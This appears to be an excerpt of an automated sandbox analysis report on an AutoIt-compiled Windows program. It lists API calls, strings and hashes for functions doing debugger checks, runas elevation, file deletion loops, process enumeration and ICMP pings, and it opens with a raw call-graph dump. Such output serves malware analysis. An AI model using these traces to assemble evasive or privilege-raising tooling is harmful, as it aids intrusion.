98851->98850 98853 2634df 98852->98853 98859 263452 _memmove 98852->98859 98855 270fe6 Mailbox 59 API calls 98853->98855 98854 270fe6 Mailbox 59 API calls 98856 263459 98854->98856 98855->98859 98857 270fe6 Mailbox 59 API calls 98856->98857 98858 263482 98856->98858 98857->98858 98858->98668 98859->98854 98861 2632aa 98860->98861 98864 263358 98860->98864 98862 270fe6 Mailbox 59 API calls 98861->98862 98865 2632dc 98861->98865 98862->98865 98863 270fe6 59 API calls Mailbox 98863->98865 98864->98668 98865->98863 98865->98864 98867 264a40 98866->98867 98868 264a39 98866->98868 98870 264a60 FreeLibrary 98867->98870 98871 264a4f 98867->98871 98869 2755c6 __fcloseall 83 API calls 98868->98869 98869->98867 98870->98871 98871->98648 98872->98652 98873->98668 98874->98662 98924 264b77 98875->98924 98878 264b50 98880 264b60 FreeLibrary 98878->98880 98881 2649d4 98878->98881 98879 264b77 2 API calls 98879->98878 98880->98881 98882 27547b 98881->98882 98928 275490 98882->98928 98884 2649e1 98884->98696 98884->98697 99009 264baa 98885->99009 98888 264b03 98890 264b15 FreeLibrary 98888->98890 98891 264a05 98888->98891 98889 264baa 2 API calls 98889->98888 98890->98891 98892 2648b0 98891->98892 98893 270fe6 Mailbox 59 API calls 98892->98893 98894 2648c5 98893->98894 99013 26433f 98894->99013 98896 2648d1 _memmove 98897 2a080a 98896->98897 98898 26490c 98896->98898 98899 2a0817 98897->98899 99021 2b9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98897->99021 98900 264a6e 69 API calls 98898->98900 99022 2b9f5e 95 API calls 98899->99022 98903 264915 98900->98903 98904 264ab2 74 API calls 98903->98904 98905 2a0859 98903->98905 98908 264a8c 85 API calls 98903->98908 98910 2649a0 98903->98910 98904->98903 99016 264a8c 98905->99016 98908->98903 98909 264ab2 74 API calls 98909->98910 98910->98705 98912 264ac4 98911->98912 98913 2a0945 98911->98913 99128 275802 98912->99128 98916 2b96c4 99253 2b951a 98916->99253 98918 2b96da 98918->98712 98920 2a0908 
98919->98920 98921 264a7d 98919->98921 99258 275e80 98921->99258 98923 264a85 98925 264b44 98924->98925 98926 264b80 LoadLibraryA 98924->98926 98925->98878 98925->98879 98926->98925 98927 264b91 GetProcAddress 98926->98927 98927->98925 98929 27549c __ioinit 98928->98929 98930 2754af 98929->98930 98933 2754e0 98929->98933 98977 278d58 58 API calls __getptd_noexit 98930->98977 98932 2754b4 98978 278fe6 9 API calls __cftof2_l 98932->98978 98947 280718 98933->98947 98936 2754e5 98937 2754ee 98936->98937 98938 2754fb 98936->98938 98979 278d58 58 API calls __getptd_noexit 98937->98979 98940 275525 98938->98940 98941 275505 98938->98941 98962 280837 98940->98962 98980 278d58 58 API calls __getptd_noexit 98941->98980 98943 2754bf __ioinit @_EH4_CallFilterFunc@8 98943->98884 98948 280724 __ioinit 98947->98948 98949 279e3b __lock 58 API calls 98948->98949 98959 280732 98949->98959 98950 2807a6 98982 28082e 98950->98982 98951 2807ad 98987 278a4d 58 API calls 2 library calls 98951->98987 98954 280823 __ioinit 98954->98936 98955 2807b4 98955->98950 98988 27a05b InitializeCriticalSectionAndSpinCount 98955->98988 98957 279ec3 __mtinitlocknum 58 API calls 98957->98959 98959->98950 98959->98951 98959->98957 98985 276e7d 59 API calls __lock 98959->98985 98986 276ee7 LeaveCriticalSection LeaveCriticalSection _doexit 98959->98986 98960 2807da EnterCriticalSection 98960->98950 98971 280857 __wopenfile 98962->98971 98963 280871 98993 278d58 58 API calls __getptd_noexit 98963->98993 98964 280a2c 98964->98963 98969 280a8f 98964->98969 98966 280876 98994 278fe6 9 API calls __cftof2_l 98966->98994 98968 275530 98981 275552 LeaveCriticalSection LeaveCriticalSection __wfsopen 98968->98981 98990 2887d1 98969->98990 98971->98963 98971->98964 98971->98971 98995 2739fb 60 API calls 2 library calls 98971->98995 98973 280a25 98973->98964 98996 2739fb 60 API calls 2 library calls 98973->98996 98975 280a44 98975->98964 98997 2739fb 60 API calls 2 library calls 98975->98997 98977->98932 98978->98943 
98979->98943 98980->98943 98981->98943 98989 279fa5 LeaveCriticalSection 98982->98989 98984 280835 98984->98954 98985->98959 98986->98959 98987->98955 98988->98960 98989->98984 98998 287fb5 98990->98998 98992 2887ea 98992->98968 98993->98966 98994->98968 98995->98973 98996->98975 98997->98964 98999 287fc1 __ioinit 98998->98999 99000 287fd7 98999->99000 99003 28800d 98999->99003 99001 278d58 __cftof2_l 58 API calls 99000->99001 99002 287fdc 99001->99002 99004 278fe6 __cftof2_l 9 API calls 99002->99004 99005 28807e __wsopen_nolock 109 API calls 99003->99005 99008 287fe6 __ioinit 99004->99008 99006 288029 99005->99006 99007 288052 __wsopen_helper LeaveCriticalSection 99006->99007 99007->99008 99008->98992 99010 264af7 99009->99010 99011 264bb3 LoadLibraryA 99009->99011 99010->98888 99010->98889 99011->99010 99012 264bc4 GetProcAddress 99011->99012 99012->99010 99014 270fe6 Mailbox 59 API calls 99013->99014 99015 264351 99014->99015 99015->98896 99017 2a0923 99016->99017 99018 264a9b 99016->99018 99023 275a6d 99018->99023 99020 264aa9 99020->98909 99021->98899 99022->98903 99024 275a79 __ioinit 99023->99024 99025 275a8b 99024->99025 99027 275ab1 99024->99027 99054 278d58 58 API calls __getptd_noexit 99025->99054 99036 276e3e 99027->99036 99028 275a90 99055 278fe6 9 API calls __cftof2_l 99028->99055 99035 275a9b __ioinit 99035->99020 99037 276e70 EnterCriticalSection 99036->99037 99038 276e4e 99036->99038 99040 275ab7 99037->99040 99038->99037 99039 276e56 99038->99039 99041 279e3b __lock 58 API calls 99039->99041 99042 2759de 99040->99042 99041->99040 99043 2759fc 99042->99043 99044 2759ec 99042->99044 99046 275a12 99043->99046 99057 275af0 99043->99057 99127 278d58 58 API calls __getptd_noexit 99044->99127 99086 274c5d 99046->99086 99047 2759f1 99056 275ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99047->99056 99052 275a53 99099 28185f 99052->99099 99054->99028 99055->99035 99056->99035 99058 275afd __ftell_nolock 99057->99058 99059 275b15 99058->99059 

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026526C
                                                          • IsDebuggerPresent.KERNEL32 ref: 0026527E
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002652E6
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 0025BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0025BC07
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00265366
                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002A0B2E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002A0B66
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00306D10), ref: 002A0BE9
                                                          • ShellExecuteW.SHELL32(00000000), ref: 002A0BF0
                                                            • Part of subcall function 0026514C: GetSysColorBrush.USER32(0000000F), ref: 00265156
                                                            • Part of subcall function 0026514C: LoadCursorW.USER32(00000000,00007F00), ref: 00265165
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(00000063), ref: 0026517C
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(000000A4), ref: 0026518E
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(000000A2), ref: 002651A0
                                                            • Part of subcall function 0026514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002651C6
                                                            • Part of subcall function 0026514C: RegisterClassExW.USER32(?), ref: 0026521C
                                                            • Part of subcall function 002650DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00265109
                                                            • Part of subcall function 002650DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0026512A
                                                            • Part of subcall function 002650DB: ShowWindow.USER32(00000000), ref: 0026513E
                                                            • Part of subcall function 002650DB: ShowWindow.USER32(00000000), ref: 00265147
                                                            • Part of subcall function 002659D3: _memset.LIBCMT ref: 002659F9
                                                            • Part of subcall function 002659D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00265A9E
                                                          Strings
                                                          • AutoIt, xrefs: 002A0B23
                                                          • runas, xrefs: 002A0BE4
                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002A0B28
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                          • API String ID: 529118366-2030392706
                                                          • Opcode ID: 8c8fb65caf0fcb8a9f3908097318c81c2720a4075eedf52b985fbf7b7af99e44
                                                          • Instruction ID: 5f2be292a4169dbbf13d6988f43c79db21df8152adb85eb141f9831016448d5a
                                                          • Opcode Fuzzy Hash: 8c8fb65caf0fcb8a9f3908097318c81c2720a4075eedf52b985fbf7b7af99e44
                                                          • Instruction Fuzzy Hash: 8B512830964299ABCB03EBB0EC95DED7B78AB0D740F184495F451661A2CEB415F7CF21

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B3D96
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B3E3E
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B3E51
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B3E6E
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B3E90
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B3EAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 26d5ac621c0e2c7562b64b5995f0ce21c7d59a31f2773f9b0fae8d5ad9a348d4
                                                          • Instruction ID: f3ee0ff656b635771bbd0657fc8c41e8ed221a52a12c9a3ecc3153f8de2d4cd5
                                                          • Opcode Fuzzy Hash: 26d5ac621c0e2c7562b64b5995f0ce21c7d59a31f2773f9b0fae8d5ad9a348d4
                                                          • Instruction Fuzzy Hash: 9451A23182115E9ACF15EBE0C9929EDB779AF10341F244166E846B7092EF307F69CF61

                                                          Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00265D40
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • GetCurrentProcess.KERNEL32(?,002E0A18,00000000,00000000,?), ref: 00265E07
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00265E0E
                                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00265E54
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00265E5F
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00265E90
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00265E9C
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: e0ae1c92eda37a38f47af78333135608a89a5ab25e5700834a483a7e85e8cf8f
                                                          • Instruction ID: c9a55d90e95c5eee1acb2da035de5a0a32ebd0fdd2926a9386bad2744b07b4a1
                                                          • Opcode Fuzzy Hash: e0ae1c92eda37a38f47af78333135608a89a5ab25e5700834a483a7e85e8cf8f
                                                          • Instruction Fuzzy Hash: 3191F731569BD1DECB31CF7484900ABFFE56F2A300F880A9ED4CB97A41D631A5A8C759

                                                          Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                          APIs
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B407C
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 002B40CC
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B40DD
                                                          • FindClose.KERNEL32(00000000), ref: 002B40F4
                                                          • FindClose.KERNEL32(00000000), ref: 002B40FD
                                                          Strings
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: f8552067a146ce2e31867e3dfa6bab1856dcc4da99cbf30d1ad98977f7d65d2a
                                                          • Instruction ID: ec681c5611032202abafa967c07c8bc17d1ccc3bc8e866a10aef05a4ca05a1f1
                                                          • Opcode Fuzzy Hash: f8552067a146ce2e31867e3dfa6bab1856dcc4da99cbf30d1ad98977f7d65d2a
                                                          • Instruction Fuzzy Hash: 8431A0310683859BC305FF60D8D58EFB7E8BE91301F440E1DF9E582192DB60AA69CB63
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 002B416D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 002B417B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 002B419B
                                                          • CloseHandle.KERNEL32(00000000), ref: 002B4245
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 5dede37be4e8ca4402cff2bbc848ae06d39970236c2fe80a2e397cb32e36d590
                                                          • Instruction ID: 95b536a9e836a8a01c7f41dabc6465bbef7238fe091cb30b8bccf629a2ce598d
                                                          • Opcode Fuzzy Hash: 5dede37be4e8ca4402cff2bbc848ae06d39970236c2fe80a2e397cb32e36d590
                                                          • Instruction Fuzzy Hash: 923195711183419FD300EF50D8C5AAFBBF8BF95350F44052DF985C61A2EBB1A9A9CB52
                                                          APIs
                                                            • Part of subcall function 00263740: CharUpperBuffW.USER32(?,003171DC,00000000,?,00000000,003171DC,?,002553A5,?,?,?,?), ref: 0026375D
                                                          • _memmove.LIBCMT ref: 0025B68A
                                                          Similarity
                                                          • API ID: BuffCharUpper_memmove
                                                          • String ID:
                                                          • API String ID: 2819905725-0
                                                          • Opcode ID: 646a900a64ed8fb3f636c31342a06896bc04fa8f6bcff84a8a24fa04bc822208
                                                          • Instruction ID: f05b5d76ca545c46b86b33c0296adc1e8f088bf2abfcde290085dacfd33cfb78
                                                          • Opcode Fuzzy Hash: 646a900a64ed8fb3f636c31342a06896bc04fa8f6bcff84a8a24fa04bc822208
                                                          • Instruction Fuzzy Hash: A5A28A756287419FDB22CF14C480B2AB7E1BF88304F14895DE89A8B361D770ED69CF96
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,0029FC86), ref: 002B495A
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B496B
                                                          • FindClose.KERNEL32(00000000), ref: 002B497B
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: a8eed1a80faf7d41ed1397ba0527a15b2e46a503d796a2ebc6a6404b7b8ea619
                                                          • Instruction ID: 9e6f531b2a35803e121ef69fe65001009113869e297b2582e2fc11e72c290884
                                                          • Opcode Fuzzy Hash: a8eed1a80faf7d41ed1397ba0527a15b2e46a503d796a2ebc6a6404b7b8ea619
                                                          • Instruction Fuzzy Hash: A1E0D8314609059742107B38FCCD8EA775C9E063B5F100705F935C50D0F7B0A9944695
                                                          APIs
                                                          • timeGetTime.WINMM ref: 0025BF57
                                                            • Part of subcall function 002552B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 002936B5
                                                          Strings
                                                          Similarity
                                                          • API ID: MessagePeekSleepTimetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                          • API String ID: 1792118007-922114024
                                                          • Opcode ID: 7bf54f7a43ecfe23e1f8cab6b4e876f0eb175d5a51a2fae4cb63f10c8c81a555
                                                          • Instruction ID: 5e408ffce4f5b122ee4f363e484f72ef901398810c28c85a7495aab65ecd32ed
                                                          • Opcode Fuzzy Hash: 7bf54f7a43ecfe23e1f8cab6b4e876f0eb175d5a51a2fae4cb63f10c8c81a555
                                                          • Instruction Fuzzy Hash: 12C2D470628341DFDB25DF24C894BAAB7E5BF84304F14891DF88A87251DB70E9A9CF46

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                          • RegisterClassExW.USER32(00000030), ref: 0025346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                          • LoadIconW.USER32(000000A9), ref: 002534C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 2d69ed106a18b12b26e41b047c1a321912b67a47a4527a1f4a30a184662fd5f9
                                                          • Instruction ID: 393f76b7a8157f9a5e5495cfe29a6a68287ce4619b81c9821e06d0f7dc2bb08c
                                                          • Opcode Fuzzy Hash: 2d69ed106a18b12b26e41b047c1a321912b67a47a4527a1f4a30a184662fd5f9
                                                          • Instruction Fuzzy Hash: 833118B1884349EFDB518FA4E889BC9BBF4FF09310F14455AE590AA2A0D7B50592CF91

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                          • RegisterClassExW.USER32(00000030), ref: 0025346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                          • LoadIconW.USER32(000000A9), ref: 002534C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 8ca02b316d8c4843ae7c821da64717de0cab97cf0b689d657356d0d715d850df
                                                          • Instruction ID: c6206226794c3d28c4767bcfc6644970717f8328a7b9709a7ba99fb239eb2a48
                                                          • Opcode Fuzzy Hash: 8ca02b316d8c4843ae7c821da64717de0cab97cf0b689d657356d0d715d850df
                                                          • Instruction Fuzzy Hash: FF21E4B1994348AFDB019FA4EC89BDDBBF8FB08700F04811AF514AA2A0D7B11585CF95

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 002700CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00263094), ref: 002700ED
                                                            • Part of subcall function 002708C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0026309F), ref: 002708E3
                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002630E2
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002A01BA
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002A01FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A0239
                                                          • _wcscat.LIBCMT ref: 002A0292
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 0472a36846490039e0eeb8c581a6346539d70bc11c7e4025e98064465e063384
                                                          • Instruction ID: a88fb4ab8c5aeabad3fe8a8a30318c9eb1197f3509f73a49676418f84afb9b96
                                                          • Opcode Fuzzy Hash: 0472a36846490039e0eeb8c581a6346539d70bc11c7e4025e98064465e063384
                                                          • Instruction Fuzzy Hash: 6C718D714253419EC306EF25E8819ABBBECFF49340F40492EF445831A1EF7099AACB56

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00265156
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00265165
                                                          • LoadIconW.USER32(00000063), ref: 0026517C
                                                          • LoadIconW.USER32(000000A4), ref: 0026518E
                                                          • LoadIconW.USER32(000000A2), ref: 002651A0
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002651C6
                                                          • RegisterClassExW.USER32(?), ref: 0026521C
                                                            • Part of subcall function 00253411: GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                            • Part of subcall function 00253411: RegisterClassExW.USER32(00000030), ref: 0025346E
                                                            • Part of subcall function 00253411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                            • Part of subcall function 00253411: InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                            • Part of subcall function 00253411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                            • Part of subcall function 00253411: LoadIconW.USER32(000000A9), ref: 002534C2
                                                            • Part of subcall function 00253411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: 386dbf333d0b89b1d0e3769bafe75cdd0377ebb1f4b4fe7138fd6de5f07a9879
                                                          • Instruction ID: 5edb64f89056ba33bb625f7f311ad4ff988c3be891b317d4bb3b8144446ec28b
                                                          • Opcode Fuzzy Hash: 386dbf333d0b89b1d0e3769bafe75cdd0377ebb1f4b4fe7138fd6de5f07a9879
                                                          • Instruction Fuzzy Hash: 22216B70D94308AFEB129FA4ED89BDD7BB8FB1C710F048519F504AA2A0C7F655928F84

                                                          Control-flow Graph

                                                          • Control-flow graph image not captured (executed / not-executed colouring lost). Recoverable from the graph dump: entry block 2c5e1d; Win32 calls along the paths are WSAStartup, inet_addr, gethostbyname, IcmpCreateFile, IcmpSendEcho (two call sites), IcmpCloseHandle and WSACleanup; the remaining nodes call internal routines only.
                                                          APIs
                                                          • WSAStartup.WS2_32(00000101,?), ref: 002C5E7E
                                                          • inet_addr.WSOCK32(?,?,?), ref: 002C5EC3
                                                          • gethostbyname.WS2_32(?), ref: 002C5ECF
                                                          • IcmpCreateFile.IPHLPAPI ref: 002C5EDD
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5F4D
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5F63
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C5FD8
                                                          • WSACleanup.WSOCK32 ref: 002C5FDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: b70d797fe287047d41eebfdc64b43dcb3259f16c3504468896dc89f018e0b7f8
                                                          • Instruction ID: 31799b3835b392002561246c4b2042f0895c9377158376b1bad3635e07d862ce
                                                          • Opcode Fuzzy Hash: b70d797fe287047d41eebfdc64b43dcb3259f16c3504468896dc89f018e0b7f8
                                                          • Instruction Fuzzy Hash: AB51AD316646119FD720EF24DC89F2AB7E4EF49710F14462DF9999B2A0DB70E9A0CF42

                                                          Control-flow Graph

                                                          • Control-flow graph image not captured (executed / not-executed colouring lost). Recoverable from the graph dump: entry block 264d83; Win32 calls along the paths are DefWindowProcW, PostQuitMessage, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, I_RpcFreeBuffer, MoveWindow and SetFocus; the remaining nodes call internal routines only.
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00264E22
                                                          • KillTimer.USER32(?,00000001), ref: 00264E4C
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00264E6F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00264E7A
                                                          • CreatePopupMenu.USER32 ref: 00264E8E
                                                          • PostQuitMessage.USER32(00000000), ref: 00264EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
